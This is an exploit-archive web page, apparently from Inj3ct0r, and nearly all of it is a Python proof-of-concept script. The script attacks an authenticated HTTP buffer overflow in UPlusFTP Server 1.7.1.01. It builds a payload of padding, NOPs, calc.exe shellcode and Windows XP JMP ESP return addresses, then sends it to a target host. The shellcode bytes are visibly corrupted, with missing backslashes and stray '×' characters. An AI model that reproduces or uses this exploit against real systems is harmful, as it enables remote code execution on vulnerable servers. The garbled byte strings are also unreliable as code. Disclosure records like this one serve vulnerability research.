UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth
===============================================================
#!/usr/bin/python
import socket,sys,base64
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
Discovered by : Karn Ganeshen
Author : Karn Ganeshen / corelanc0d3r
KarnGaneshen [aT] gmail [d0t] com
http://ipositivesecurity.blogspot.com
Greetz out to: corelanc0d3r
http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
if len(sys.argv) != 5:
print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
auth = base64.b64encode(user+":"+pwd)
buf="A"*1963
buf+="x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("xd9xcax29xc9xb1×24xbfx3fxc7×66x9fxd9×74x24xf4×5e"
"x31×7ex17×03x7ex17×83xf9xc3×84x6axf9×24x0cx95×01"
"xb5×06xd0×3dx3ex64xdex45×41x7ax6bxfax59×0fx33×24"
"x5bxe4×85xafx6fx71×14x41xbex45×8ex31×45x85xc5×4e"
"x87xccx2bx51xc5×3axc7×6ax9dx98×2cxf9xf8×6ax73×25"
"x02×86xeaxaex08×13x78xefx0cxa2×95x84×31x2fx68×71"
"xc0×73x4fx81×10xbax4fxedx1dxfdx7fx68xe1×86x73xf9"
"xa2×7ax07×8dx3ex2ex9cx05×37xdbxaax5exc7xabxadx60"
"xc8×40xc5×5cx97×67xe0xfcx71×01xf4×7fxbdx6ax55×17"
"xcex07×51xb8×46x80xa4xccx99xe7xa7×37xc6×66x34xd4"
"x27×0cxbcx7fx38")
buf+="x90"*15
#[ XP SP2 ] -> "x78×16xF3×77" #0×77F31678 JMP ESP
buf+="x78×16xF3×77"
#[ XP SP3 ] -> "x3Fx71×49x7E" #0×7E49713F JMP ESP
#buf+="x3Fx71×49x7E"
buf+="x90"*30
buf+="x66×05x7Ax03" #ADD AX,037A
buf+="x66×05x7Ax03" #ADD AX,037A
buf+="x66×05x7Ax03" #ADD AX,037A
buf+="x50xc3" #PUSH EAX + RET
print "[+] Launching exploit against " + target + "…"
head = "GET /list.html?path="+buf+" HTTP/1.1 rn"
head += "Host: rn"
head += "Authorization: Basic "+auth+"rn"
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, port))
s.send(head + "rn")
print "[!] Payload sent…"
s.close()
except:
print "[x] Error!"
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-28]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13501
Leave a Reply